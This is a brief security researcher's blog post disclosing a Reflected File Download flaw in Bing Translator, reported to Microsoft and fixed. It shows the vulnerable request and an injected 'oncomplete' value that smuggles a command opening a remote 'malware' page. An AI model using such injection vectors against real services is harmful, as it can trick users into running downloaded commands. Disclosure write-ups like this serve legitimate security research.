When using Bing online translator I noticed a XHR request on my browser that caught my attention:

[code lang=”html”]http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=jQuery111207287312552798539_1444907172498&market=en&word=test&_=1444907172499[/code]

On which reflected on the screen:

[code lang=”html”]jQuery111207287312552798539_1444907172498();[/code]

As a security researcher I always try to find different ways to bypass security specially related to Reflected File Download. So I tried to inject a RFD vector on the parameter “oncomplete”:

[code lang=”html”]http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=start%20chrome%20davidsopas.com/poc/malware.htm[/code]

On which reflected on the screen:

[code lang=”html”]start chrome davidsopas.com/poc/malware.htm();[/code]

Using the HTML5 download attribute I was able to send a security report to Microsoft which they fixed within a month.

With this report I was listed on the Security Researcher Acknowledgments for Microsoft Online Services for the forth time.

Leave a Reply